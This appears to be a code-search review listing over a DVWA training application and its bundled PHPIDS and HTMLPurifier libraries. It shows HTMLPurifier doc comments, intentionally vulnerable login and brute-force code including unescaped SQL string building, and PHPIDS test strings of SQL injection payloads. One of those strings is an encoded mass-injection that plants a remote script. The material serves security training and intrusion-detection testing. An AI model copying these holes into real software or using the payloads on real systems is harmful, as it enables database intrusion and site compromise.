./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:7 (42/95) OK | Dubious | Bad | Hide 
4- * Experimental HTML5-based parser using Jeroen van der Meer's PH5P library.
5- * Occupies space in the HTML5 pseudo-namespace, which may cause conflicts.
6- * 
7: * @note
8- *    Recent changes to PHP's DOM extension have resulted in some fatal
9- *    error conditions with the original version of PH5P. Pending changes,
10- *    this lexer will punt to DirectLex if DOM throughs an exception.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Printer.php:36 (43/95) OK | Dubious | Bad | Hide 
33-    
34-    /**
35-     * Main function that renders object or aspect of that object
36:     * @note Parameters vary depending on printer
37-     */
38-    // function render() {}
39-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ElementDef.php:6 (44/95) OK | Dubious | Bad | Hide 
3-/**
4- * Structure that stores an HTML element definition. Used by
5- * HTMLPurifier_HTMLDefinition and HTMLPurifier_HTMLModule.
6: * @note This class is inspected by HTMLPurifier_Printer_HTMLDefinition.
7- *       Please update that class too.
8- */
9-class HTMLPurifier_ElementDef
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ElementDef.php:20 (45/95) OK | Dubious | Bad | Hide 
17-    
18-    /**
19-     * Associative array of attribute name to HTMLPurifier_AttrDef
20:     * @note Before being processed by HTMLPurifier_AttrCollections
21-     *       when modules are finalized during
22-     *       HTMLPurifier_HTMLDefinition->setup(), this array may also
23-     *       contain an array at index 0 that indicates which attribute
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ElementDef.php:82 (46/95) OK | Dubious | Bad | Hide 
79-    
80-    /**
81-     * Lookup table of tags excluded from all descendants of this tag.
82:     * @note SGML permits exclusions for all descendants, but this is
83-     *       not possible with DTDs or XML Schemas. W3C has elected to
84-     *       use complicated compositions of content_models to simulate
85-     *       exclusion for children, but we go the simpler, SGML-style
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:22 (47/95) OK | Dubious | Bad | Hide 
19- * does not actually define any implementation, but offers commonly used
20- * convenience functions for subclasses.
21- * 
22: * @note The unit tests will instantiate this class for testing purposes, as
23- *       many of the utility functions require a class to be instantiated.
24- *       This means that, even though this class is not runnable, it will
25- *       not be declared abstract.
26- * 
27- * @par
28- * 
29: * @note
30- * We use tokens rather than create a DOM representation because DOM would:
31- * 
32- * @par
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:60 (48/95) OK | Dubious | Bad | Hide 
57-     * a few exceptions involving special features that only DirectLex
58-     * implements.
59-     * 
60:     * @note The behavior of this class has changed, rather than accepting
61-     *       a prototype object, it now accepts a configuration object.
62-     *       To specify your own prototype, set %Core.LexerImpl to it.
63-     *       This change in behavior de-singletonizes the lexer object.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ContentSets.php:16 (49/95) OK | Dubious | Bad | Hide 
13-    
14-    /**
15-     * List of content set lookups (element => true) indexed by name.
16:     * @note This is in HTMLPurifier_HTMLDefinition->info_content_sets
17-     */
18-    public $lookup = array();
19-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ContentSets.php:99 (50/95) OK | Dubious | Bad | Hide 
96-    /**
97-     * Instantiates a ChildDef based on content_model and content_model_type
98-     * member variables in HTMLPurifier_ElementDef
99:     * @note This will also defer to modules for custom HTMLPurifier_ChildDef
100-     *       subclasses that need content set expansion
101-     * @param $def HTMLPurifier_ElementDef to have ChildDef extracted
102-     * @return HTMLPurifier_ChildDef corresponding to ElementDef
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/IDAccumulator.php:5 (51/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Component of HTMLPurifier_AttrContext that accumulates IDs to prevent dupes
5: * @note In Slashdot-speak, dupe means duplicate.
6: * @note The default constructor does not accept $config or $context objects:
7- *       use must use the static build() factory method to perform initialization.
8- */
9-class HTMLPurifier_IDAccumulator
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/IDAccumulator.php:43 (52/95) OK | Dubious | Bad | Hide 
40-    /**
41-     * Load a list of IDs into the lookup table
42-     * @param $array_of_ids Array of IDs to load
43:     * @note This function doesn't care about duplicates
44-     */
45-    public function load($array_of_ids) {
46-        foreach ($array_of_ids as $id) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URISchemeRegistry.php:13 (53/95) OK | Dubious | Bad | Hide 
10-     * Retrieve sole instance of the registry.
11-     * @param $prototype Optional prototype to overload sole instance with,
12-     *                   or bool true to reset to default registry.
13:     * @note Pass a registry object $prototype with a compatible interface and
14-     *       the function will copy it and return it all further times.
15-     */
16-    public static function instance($prototype = null) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/TagTransform/Font.php:10 (54/95) OK | Dubious | Bad | Hide 
7- * transforms them into their corresponding CSS attributes.  These are color,
8- * face, and size.
9- * 
10: * @note Size is an interesting case because it doesn't map cleanly to CSS.
11- *       Thanks to
12- *       http://style.cleverchimp.com/font_size_intervals/altintervals.html
13- *       for reasonable mappings.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Image.php:5 (55/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * XHTML 1.1 Image Module provides basic image embedding.
5: * @note There is specialized code for removing empty images in
6- *       HTMLPurifier_Strategy_RemoveForeignElements
7- */
8-class HTMLPurifier_HTMLModule_Image extends HTMLPurifier_HTMLModule
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Legacy.php:7 (56/95) OK | Dubious | Bad | Hide 
4- * XHTML 1.1 Legacy module defines elements that were previously 
5- * deprecated.
6- * 
7: * @note Not all legacy elements have been implemented yet, which
8- *       is a bit of a reverse problem as compared to browsers! In
9- *       addition, this legacy module may implement a bit more than
10- *       mandated by XHTML 1.1.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Scripting.php:14 (57/95) OK | Dubious | Bad | Hide 
11- * XHTML 1.1 Scripting module, defines elements that are used to contain
12- * information pertaining to executable scripts or the lack of support
13- * for executable scripts.
14: * @note This module does not contain inline scripting elements
15- */
16-class HTMLPurifier_HTMLModule_Scripting extends HTMLPurifier_HTMLModule
17-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Text.php:5 (58/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * XHTML 1.1 Text Module, defines basic text containers. Core Module.
5: * @note In the normative XML Schema specification, this module
6- *       is further abstracted into the following modules:
7- *          - Block Phrasal (address, blockquote, pre, h1, h2, h3, h4, h5, h6)
8- *          - Block Structural (div, p)
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Tidy.php:169 (59/95) OK | Dubious | Bad | Hide 
166-     * as other information defined by the fix
167-     * @param $name String name of fix
168-     * @return array(string $fix_type, array $fix_parameters)
169:     * @note $fix_parameters is type dependant, see populate() for usage
170-     *       of these parameters
171-     */
172-    public function getFixType($name) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Presentation.php:6 (60/95) OK | Dubious | Bad | Hide 
3-/**
4- * XHTML 1.1 Presentation Module, defines simple presentation-related
5- * markup. Text Extension Module.
6: * @note The official XML Schema and DTD specs further divide this into
7- *       two modules:
8- *          - Block Presentation (hr)
9- *          - Inline Presentation (b, big, i, small, sub, sup, tt)
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModuleManager.php:133 (61/95) OK | Dubious | Bad | Hide 
130-     * @param $overload Boolean whether or not to overload previous modules.
131-     *                  If this is not set, and you do overload a module,
132-     *                  HTML Purifier will complain with a warning.
133:     * @note This function will not call autoload, you must instantiate
134-     *       (and thus invoke) autoload outside the method.
135:     * @note If a string is passed as a module name, different variants
136-     *       will be tested in this order:
137-     *          - Check for HTMLPurifier_HTMLModule_$name
138-     *          - Check all prefixes with $name in order they were added
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModuleManager.php:326 (62/95) OK | Dubious | Bad | Hide 
323-     * @param $trusted Boolean trusted overriding parameter: set to true
324-     *                 if you want the full version of an element
325-     * @return Merged HTMLPurifier_ElementDef
326:     * @note You may notice that modules are getting iterated over twice (once
327-     *       in getElements() and once here). This
328-     *       is because 
329-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:5 (63/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * A UTF-8 specific character encoder that handles cleaning and transforming.
5: * @note All functions in this class should be static.
6- */
7-class HTMLPurifier_Encoder
8-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:28 (64/95) OK | Dubious | Bad | Hide 
25-     * It will parse according to UTF-8 and return a valid UTF8 string, with
26-     * non-SGML codepoints excluded.
27-     * 
28:     * @note Just for reference, the non-SGML code points are 0 to 31 and
29-     *       127 to 159, inclusive.  However, we allow code points 9, 10
30-     *       and 13, which are the tab, line feed and carriage return
31-     *       respectively. 128 and above the code points map to multibyte
32-     *       UTF-8 representations.
33-     * 
34:     * @note Fallback code adapted from utf8ToUnicode by Henri Sivonen and
35-     *       hsivonen@iki.fi at <http://iki.fi/hsivonen/php-utf8/> under the
36-     *       LGPL license.  Notes on what changed are inside, but in general,
37-     *       the original code transformed UTF-8 text into an array of integer
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:202 (65/95) OK | Dubious | Bad | Hide 
199-    
200-    /**
201-     * Translates a Unicode codepoint into its corresponding UTF-8 character.
202:     * @note Based on Feyd's function at
203-     *       <http://forums.devnetwork.net/viewtopic.php?p=191404#191404>,
204-     *       which is in public domain.
205:     * @note While we're going to do code point parsing anyway, a good
206-     *       optimization would be to refuse to translate code points that
207-     *       are non-SGML characters.  However, this could lead to duplication.
208:     * @note This is very similar to the unichr function in
209-     *       maintenance/generate-entity-file.php (although this is superior,
210-     *       due to its sanity checks).
211-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:296 (66/95) OK | Dubious | Bad | Hide 
293-    
294-    /**
295-     * Converts a string from UTF-8 based on configuration.
296:     * @note Currently, this is a lossy conversion, with unexpressable
297-     *       characters being omitted.
298-     */
299-    public static function convertFromUTF8($str, $config, $context) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:336 (67/95) OK | Dubious | Bad | Hide 
333-     * @warning Adapted from MediaWiki, claiming fair use: this is a common
334-     *       algorithm. If you disagree with this license fudgery,
335-     *       implement it yourself.
336:     * @note Uses decimal numeric entities since they are best supported.
337:     * @note This is a DUMB function: it has no concept of keeping
338-     *       character entities that the projected character encoding
339-     *       can allow. We could possibly implement a smart version
340-     *       but that would require it to also know which Unicode
341-     *       codepoints the charset supported (not an easy task).
342:     * @note Sort of with cleanUTF8() but it assumes that $str is
343-     *       well-formed UTF-8
344-     */
345-    public static function convertToASCIIDumbLossless($str) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ChildDef/Optional.php:5 (68/95) OK | Dubious | Bad | Hide 
2-
3-/**
4- * Definition that allows a set of elements, and allows no children.
5: * @note This is a hack to reuse code from HTMLPurifier_ChildDef_Required,
6- *       really, one shouldn't inherit from the other.  Only altered behavior
7- *       is to overload a returned false with an array.  Thus, it will never
8- *       return false.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ChildDef/StrictBlockquote.php:15 (69/95) OK | Dubious | Bad | Hide 
12-    protected $init = false;
13-    
14-    /**
15:     * @note We don't want MakeWellFormed to auto-close inline elements since
16-     *       they might be allowed.
17-     */
18-    public function getNonAutoCloseElements($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:9 (70/95) OK | Dubious | Bad | Hide 
6- * @warning This class is strongly defined: that means that the class
7- *          will fail if an undefined directive is retrieved or set.
8- * 
9: * @note Many classes that could (although many times don't) use the
10- *       configuration object make it a mandatory parameter.  This is
11- *       because a configuration object should always be forwarded,
12- *       otherwise, you run the risk of missing a parameter and then
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:56 (71/95) OK | Dubious | Bad | Hide 
53-    
54-    /**
55-     * Reference HTMLPurifier_ConfigSchema for value checking
56:     * @note This is public for introspective purposes. Please don't
57-     *       abuse!
58-     */
59-    public $def;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:154 (72/95) OK | Dubious | Bad | Hide 
151-    /**
152-     * Returns a md5 signature of a segment of the configuration object
153-     * that uniquely identifies that particular configuration
154:     * @note Revision is handled specially and is removed from the batch
155-     *       before processing!
156-     * @param $namespace Namespace to get serial for
157-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:422 (73/95) OK | Dubious | Bad | Hide 
419-    
420-    /**
421-     * Merges in configuration values from $_GET/$_POST to object. NOT STATIC.
422:     * @note Same parameters as loadArrayFromForm
423-     */
424-    public function mergeArrayFromForm($array, $index = false, $allowed = true, $mq_fix = true) {
425-         $ret = HTMLPurifier_Config::prepareArrayFromForm($array, $index, $allowed, $mq_fix, $this->def);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Doctype.php:6 (74/95) OK | Dubious | Bad | Hide 
3-/**
4- * Represents a document type, contains information on which modules
5- * need to be loaded.
6: * @note This class is inspected by Printer_HTMLDefinition->renderDoctype.
7- *       If structure changes, please update that function.
8- */
9-class HTMLPurifier_Doctype
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/LanguageFactory.php:6 (75/95) OK | Dubious | Bad | Hide 
3-/**
4- * Class responsible for generating HTMLPurifier_Language objects, managing
5- * caching and fallbacks.
6: * @note Thanks to MediaWiki for the general logic, although this version
7- *       has been entirely rewritten
8- * @todo Serialized cache for languages
9- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/LanguageFactory.php:70 (76/95) OK | Dubious | Bad | Hide 
67-    
68-    /**
69-     * Sets up the singleton, much like a constructor
70:     * @note Prevents people from getting this outside of the singleton
71-     */
72-    public function setup() {
73-        $this->validator = new HTMLPurifier_AttrDef_Lang();
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/LanguageFactory.php:126 (77/95) OK | Dubious | Bad | Hide 
123-    
124-    /**
125-     * Returns the fallback language for language
126:     * @note Loads the original language into cache
127-     * @param $code string language code
128-     */
129-    public function getFallbackFor($code) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/VarParser.php:126 (78/95) OK | Dubious | Bad | Hide 
123-    
124-    /**
125-     * Throws an inconsistency exception.
126:     * @note This should not ever be called. It would be called if we
127-     *       extend the allowed values of HTMLPurifier_VarParser without
128-     *       updating subclasses.
129-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIScheme.php:28 (79/95) OK | Dubious | Bad | Hide 
25-    
26-    /**
27-     * Validates the components of a URI
28:     * @note This implementation should be called by children if they define
29-     *       a default port, as it does port processing.
30-     * @param $uri Instance of HTMLPurifier_URI
31-     * @param $config HTMLPurifier_Config object
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema.php:10 (80/95) OK | Dubious | Bad | Hide 
7-    
8-    /**
9-     * Defaults of the directives and namespaces.
10:     * @note This shares the exact same structure as HTMLPurifier_Config::$conf
11-     */
12-    public $defaults = array();
13-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/StringHashParser.php:62 (81/95) OK | Dubious | Bad | Hide 
59-    
60-    /**
61-     * Internal parser that acepts a file handle.
62:     * @note While it's possible to simulate in-memory parsing by using
63-     *       custom stream wrappers, if such a use-case arises we should
64-     *       factor out the file handle into its own class.
65-     * @param $fh File handle with pointer at start of valid string-hash
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:6 (82/95) OK | Dubious | Bad | Hide 
3-/**
4- * Represents an XHTML 1.1 module, with information on elements, tags
5- * and attributes.
6: * @note Even though this is technically XHTML 1.1, it is also used for
7- *       regular HTML parsing. We are using modulization as a convenient
8- *       way to represent the internals of HTMLDefinition, and our
9- *       implementation is by no means conforming and does not directly
10- *       use the normative DTDs or XML schemas.
11: * @note The public variables in a module should almost directly
12- *       correspond to the variables in HTMLPurifier_HTMLDefinition.
13- *       However, the prefix info carries no special meaning in these
14- *       objects (include it anyway if that's the correspondence though).
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:97 (83/95) OK | Dubious | Bad | Hide 
94-     * which is based off of safe HTML, to explicitly say, "This is safe," even
95-     * though there are modules which are "unsafe")
96-     * 
97:     * @note Previously, safety could be applied at an element level granularity.
98-     *       We've removed this ability, so in order to add "unsafe" elements
99-     *       or attributes, a dedicated module with this property set to false
100-     *       must be used.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:126 (84/95) OK | Dubious | Bad | Hide 
123-     * @param $attr_includes What attribute collections to register to
124-     *              element?
125-     * @param $attr What unique attributes does the element define?
126:     * @note See ElementDef for in-depth descriptions of these parameters.
127-     * @return Created element definition object, so you 
128-     *         can set advanced parameters
129-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:181 (85/95) OK | Dubious | Bad | Hide 
178-     * into separate content model and content model type
179-     * @param $contents Allowed children in form of:
180-     *                  "$content_model_type: $content_model"
181:     * @note If contents is an object, an array of two nulls will be
182-     *       returned, and the callee needs to take the original $contents
183-     *       and use it directly.
184-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:220 (86/95) OK | Dubious | Bad | Hide 
217-     * Convenience function that generates a lookup table with boolean
218-     * true as value.
219-     * @param $list List of values to turn into a lookup
220:     * @note You can also pass an arbitrary number of arguments in
221-     *       place of the regular argument
222-     * @return Lookup array equivalent of list
223-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Generator.php:143 (87/95) OK | Dubious | Bad | Hide 
140-    
141-    /**
142-     * Generates attribute declarations from attribute array.
143:     * @note This does not include the leading or trailing space.
144-     * @param $assoc_array_of_attributes Attribute array
145-     * @param $element Name of element attributes are for, used to check
146-     *        attribute minimization.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/EntityLookup.php:15 (88/95) OK | Dubious | Bad | Hide 
12-    
13-    /**
14-     * Sets up the entity lookup table from the serialized file contents.
15:     * @note The serialized contents are versioned, but were generated
16-     *       using the maintenance script generate_entity_file.php
17-     * @warning This is not in constructor to help enforce the Singleton
18-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Injector.php:225 (89/95) OK | Dubious | Bad | Hide 
222-    
223-    /**
224-     * Notifier that is called when an end token is processed
225:     * @note This differs from handlers in that the token is read-only
226-     * @deprecated
227-     */
228-    public function notifyEnd($token) {}
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef.php:47 (90/95) OK | Dubious | Bad | Hide 
44-     * attributes specified as CDATA, it can also be applied to most CSS
45-     * values.
46-     * 
47:     * @note This method is not entirely standards compliant, as trim() removes
48-     *       more types of whitespace than specified in the spec. In practice,
49-     *       this is rarely a problem, as those extra characters usually have
50-     *       already been removed by HTMLPurifier_Encoder.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Language.php:55 (91/95) OK | Dubious | Bad | Hide 
52-    
53-    /**
54-     * Loads language object with necessary info from factory cache
55:     * @note This is a lazy loader
56-     */
57-    public function load() {
58-        if ($this->_loaded) return;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/PercentEncoder.php:43 (92/95) OK | Dubious | Bad | Hide 
40-    /**
41-     * Our replacement for urlencode, it encodes all non-reserved characters,
42-     * as well as any extra characters that were instructed to be preserved.
43:     * @note
44-     *      Assumes that the string has already been normalized, making any
45-     *      and all percent escape sequences valid. Percents will not be
46-     *      re-escaped, regardless of their status in $preserve
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.func.php:6 (93/95) OK | Dubious | Bad | Hide 
3-/**
4- * @file
5- * Defines a function wrapper for HTML Purifier for quick use.
6: * @note ''HTMLPurifier()'' is NOT the same as ''new HTMLPurifier()''
7- */
8-
9-/**
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.php:43 (94/95) OK | Dubious | Bad | Hide 
40-/**
41- * Facade that coordinates HTML Purifier's subsystems in order to purify HTML.
42- * 
43: * @note There are several points in which configuration can be specified 
44- *       for HTML Purifier.  The precedence of these (from lowest to
45- *       highest) is as follows:
46- *          -# Instance: new HTMLPurifier($config)
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.php:228 (95/95) OK | Dubious | Bad | Hide 
225-    }
226-    
227-    /**
228:     * @note Backwards compatibility, see instance()
229-     */
230-    public static function getInstance($prototype = null) {
231-        return HTMLPurifier::instance($prototype);

username (16) Top | Hide

./login.php:14 (1/16) OK | Dubious | Bad | Hide 
12-
13-
14:	$user = $_POST[ 'username' ];
15-	$user = stripslashes( $user );
16-	$user = mysql_real_escape_string( $user );
17-
./login.php:76 (2/16) OK | Dubious | Bad | Hide 
73-	
74-	<fieldset>
75-
76:			<label for=\"user\">Username</label> <input type=\"text\" class=\"loginInput\" size=\"20\" name=\"username\"><br />
77-	
78-			
79-			<label for=\"pass\">Password</label> <input type=\"password\" class=\"loginInput\" AUTOCOMPLETE=\"off\" size=\"20\" name=\"password\"><br />
./vulnerabilities/brute/index.php:44 (3/16) OK | Dubious | Bad | Hide 
41-		<h2>Login</h2>
42-
43-		<form action=\"#\" method=\"GET\">
44:			Username:<br><input type=\"text\" name=\"username\"><br>
45-			Password:<br><input type=\"password\" AUTOCOMPLETE=\"off\" name=\"password\"><br>
46-			<input type=\"submit\" value=\"Login\" name=\"Login\">
47-		</form>
./vulnerabilities/brute/source/low.php:5 (4/16) OK | Dubious | Bad | Hide 
2-
3-if( isset( $_GET['Login'] ) ) {
4-
5:	$user = $_GET['username'];
6-	
7-	$pass = $_GET['password'];
8-	$pass = md5($pass);
./vulnerabilities/brute/source/high.php:5 (5/16) OK | Dubious | Bad | Hide 
2-
3-if( isset( $_GET[ 'Login' ] ) ) {
4-
5:	// Sanitise username input
6:	$user = $_GET[ 'username' ];
7-	$user = stripslashes( $user );
8-	$user = mysql_real_escape_string( $user );
9-
./vulnerabilities/brute/source/medium.php:5 (6/16) OK | Dubious | Bad | Hide 
2-
3-if( isset( $_GET[ 'Login' ] ) ) {
4-
5:	// Sanitise username input
6:	$user = $_GET[ 'username' ];
7-	$user = mysql_real_escape_string( $user );
8-
9-	// Sanitise password input
./external/phpids/0.6/tests/IDS/MonitorTest.php:624 (7/16) OK | Dubious | Bad | Hide 
621-        $exploits[] = 'aaa\' or (1)=(1) #!asd';
622-        $exploits[] = 'aaa\' OR (1) IS NOT NULL #!asd';
623-        $exploits[] = 'a\' or 1=\'1';
624:        $exploits[] = 'asd\' union (select username,password from admins) where id=\'1';
625-        $exploits[] = "1'; WAITFOR TIME '17:48:00 ' shutdown -- -a";
626-        $exploits[] = "1'; anything: goto anything -- -a";
627-        $exploits[] = "' =+ '";
./external/phpids/0.6/tests/IDS/MonitorTest.php:861 (8/16) OK | Dubious | Bad | Hide 
858-        $exploits[] = "1'^column is not null - ' ";
859-        $exploits[] = "'is\N - '1";
860-        $exploits[] = "aa' is 0 or '1";
861:        $exploits[] = "' or MATCH username AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a";
862:        $exploits[] = "' or MATCH username AGAINST ('a* -) -+ ' IN BOOLEAN MODE); -- -a";
863-        $exploits[] = "1'*@a or '1";
864-        $exploits[] = "1'*null or '1";
865-        $exploits[] = "1'*UTC_TIME or '1";
./external/phpids/0.6/tests/IDS/MonitorTest.php:911 (9/16) OK | Dubious | Bad | Hide 
908-        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';
909-        $exploits[] = "asaa';SELECT[asd]FROM[asd]";
910-        $exploits[] = "asd'; select [column] from users ";
911:        $exploits[] = "0x31 union select @@version,username,password from users ";
912-		$exploits[] = "1 order by if(1<2 ,uname,uid) ";
913-		$exploits[] = "1 order by ifnull(null,userid) ";
914-		$exploits[] = "2' between 1 and 3 or 0x61 like 'a";
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:85 (10/16) OK | Dubious | Bad | Hide 
82-            if ($this->host === false) $this->host = null;
83-        }
84-        
85:        // validate username
86-        if (!is_null($this->userinfo)) {
87-            $encoder = new HTMLPurifier_PercentEncoder($chars_sub_delims . ':');
88-            $this->userinfo = $encoder->encode($this->userinfo);
./dvwa/includes/dvwaPage.inc.php:114 (11/16) OK | Dubious | Bad | Hide 
111-
112-	$dvwaSession =& dvwaSessionGrab();
113-
114:	$dvwaSession['username'] = $pUsername;
115-
116-}
117-
./dvwa/includes/dvwaPage.inc.php:123 (12/16) OK | Dubious | Bad | Hide 
120-
121-	$dvwaSession =& dvwaSessionGrab();
122-
123:	return isset( $dvwaSession['username'] );
124-
125-}
126-
./dvwa/includes/dvwaPage.inc.php:132 (13/16) OK | Dubious | Bad | Hide 
129-
130-	$dvwaSession =& dvwaSessionGrab();
131-
132:	unset( $dvwaSession['username'] );
133-
134-}
135-
./dvwa/includes/dvwaPage.inc.php:147 (14/16) OK | Dubious | Bad | Hide 
144-
145-	$dvwaSession =& dvwaSessionGrab();
146-
147:	return ( isset( $dvwaSession['username']) ? $dvwaSession['username'] : '') ;
148-
149-}
150-
./dvwa/includes/DBMS/PGSQL.php:46 (15/16) OK | Dubious | Bad | Hide 
43-	dvwaPageReload();
44-}
45-
46:$create_tb = "CREATE TABLE users (user_id integer UNIQUE, first_name text, last_name text, username text, password text, avatar text, PRIMARY KEY (user_id));";
47-
48-if( !pg_query( $create_tb ) ){
49-	dvwaMessagePush( "Table could not be created<br />SQL: " . pg_last_error() );
./dvwa/includes/DBMS/DBMS.php:45 (16/16) OK | Dubious | Bad | Hide 
42- }
43- 
44- function db_login( $user,$pass ) {
45:    $login = "SELECT * FROM users WHERE username='$user' AND password='$pass';";
46-  
47-  $result = @pg_query( $login ) or die('<pre>' . pg_last_error() . '</pre>');
48-

password (42) Top | Hide

./login.php:18 (1/42) OK | Dubious | Bad | Hide 
16-	$user = mysql_real_escape_string( $user );
17-
18:	$pass = $_POST[ 'password' ];
19-	$pass = stripslashes( $pass );
20-	$pass = mysql_real_escape_string( $pass );
21-	$pass = md5( $pass );
22-
23:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
24-
25-	$result = @mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
26-
./login.php:79 (2/42) OK | Dubious | Bad | Hide 
76-			<label for=\"user\">Username</label> <input type=\"text\" class=\"loginInput\" size=\"20\" name=\"username\"><br />
77-	
78-			
79:			<label for=\"pass\">Password</label> <input type=\"password\" class=\"loginInput\" AUTOCOMPLETE=\"off\" size=\"20\" name=\"password\"><br />
80-			
81-			
82-			<p class=\"submit\"><input type=\"submit\" value=\"Login\" name=\"Login\"></p>
./config/config.inc.php:18 (3/42) OK | Dubious | Bad | Hide 
15-$_DVWA[ 'db_server' ] = 'localhost';
16-$_DVWA[ 'db_database' ] = 'dvwa';
17-$_DVWA[ 'db_user' ] = 'root';
18:$_DVWA[ 'db_password' ] = '';
19-
20-# Only needed for PGSQL
21-$_DVWA[ 'db_port' ] = '5432';
./vulnerabilities/csrf/index.php:41 (4/42) OK | Dubious | Bad | Hide 
38-
39-	<div class=\"vulnerable_code_area\">
40-	
41:	<h3>Change your admin password:</h3>
42-    <br>
43-    <form action=\"#\" method=\"GET\">";
44-	
45-	if (dvwaSecurityLevelGet() == 'high'){
46:		$page[ 'body' ] .= "Current password:<br>
47:		<input type=\"password\" AUTOCOMPLETE=\"off\" name=\"password_current\"><br>";
48-	}
49-    
50:$page[ 'body' ] .= "    New password:<br>
